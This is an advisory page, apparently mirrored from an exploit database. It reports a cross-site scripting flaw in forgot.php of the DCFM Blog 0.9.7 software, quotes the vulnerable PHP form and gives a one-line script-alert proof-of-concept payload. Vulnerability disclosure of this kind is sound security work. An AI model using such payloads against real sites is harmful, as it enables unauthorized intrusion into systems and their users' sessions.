Lucene search
K

DCFM Blog 0.9.7 Cross Site Scripting Vulnerability

🗓️ 18 Nov 2016 00:00:00Reported by N_AType 
zdt
 zdt
🔗 0day.today👁 30 Views

Open-source blog project. Free blog system for any website. Uses MySQL and PHP 5. Very easily customizable and incredibly flexible

Code
DCFM Blog 0.9.7 XSS Attack
===========================


Description
============

Open-source blog project. Free blog system for any website. Uses MySQL and PHP 5. Very easily customizable and incredibly flexible.

https://sourceforge.net/projects/dcfm-blog/


Vulnerability
=============


The forgot.php file in DCFM Blog 0.9.7 does not proplery check input and code injection is possible.


if (!isset($_POST['userf'])) {
  echo "<form action='forgot.php' method='post'>
  Please provide your username:
  <input type='text' name='userf' />
  <br /><br /><input type='submit' value='Get my Password' />
</form>";


Proof Of Concept String
========================


<script>alert('XSS');</script>

#  0day.today [2018-03-14]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

18 Nov 2016 00:00Current
6.7Medium risk
Vulners AI Score6.7
30